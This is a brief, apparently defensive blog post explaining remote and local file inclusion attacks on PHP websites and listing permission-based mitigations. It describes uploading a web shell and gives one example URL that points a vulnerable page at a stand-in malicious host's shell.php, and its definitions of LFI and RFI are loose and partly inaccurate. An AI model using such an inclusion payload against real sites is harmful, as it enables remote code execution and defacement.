RFI – LFI File Inclusion Attacks – Mitigations

file inclusion

Similar to all other cyber attacks RFI – LFI file inclusion attacks also carries a strong importance when it comes to data breach. In other words we can describe it as why the server isn’t working to load my webpages.

File Inclusion

File inclusion is a type of vulnerability that allows an attacker to include a file on the Server without proper sanitization.

The act of uploading a malicious file on the server and executing it through directory traversal is know as file inclusion.

The type of attack occurs on PHP based websites where the developers have no enough information about how to sanitize and validate the user inputs. In file inclusion the user supplied input leads to file inclusion attack. Beside this, the file inclusion can exploit the functionality of web server and thus can often leads to most serious attacks.

  1. Danial of Service Attack
  2. Cross Site Scripting
  3. Code Execution
  4. Data Manipulation


In a usual case, the web server allows a users to upload a file of below 100kb e.g an image.

The malicious user take advantage in such a way that instead of normal file the user upload a web shell, which is nothing else but a command prompt or shell excess to the server remotely when executed. If the web shell exceeds 100kb, the attacker changes the run time environment for the file.

file inclusion

On a successful upload the server responds back with a success message, stating the uploading path. For example

ddOnce the file path is known it can be accessed remotely over the web by traversing to the file location using the uploaded path. Now if the file is accessed it allows remote administration such as creating, uploading, deleting the files and folders over the server which can take the advantage to deface the website. This is called Local File Inclusion.

The same malicious file can be accessed from different server e.g server X, by allowing the URL of the malicious file along with the URL of server X. This now allows the attacker to remotely execute the shell from server X. This is called Remote File Inclusion.

e.g http://www.ServerX.com/page?”http://www.MaliciousSite.com/hacked/uploads/shell.php”


The following are some of the mechanisms by which File Inclusion can be mitigated:

  1. Use the tightest possible permissions when developing and deploying web
  2. Consider using chroot jails and code access security policies to restrict and control
    the location and type of file operations, even if the system is miss-configured.
  3. Remove all “Everyone: Full Control” ACLs on Windows, and all mode 777 (world
    write-able directories) or mode 666 files (world write-able files) on Unix systems.
  4. Strongly consider removing “Guest”, “everyone,” and world readable permissions wherever possible.

File Inclusion attack: LFI and RFI is a result of allowing unsecure data into a secure context.
The best way to prevent this attack is to never use arbitrary input data in a literal file include

Leave a Reply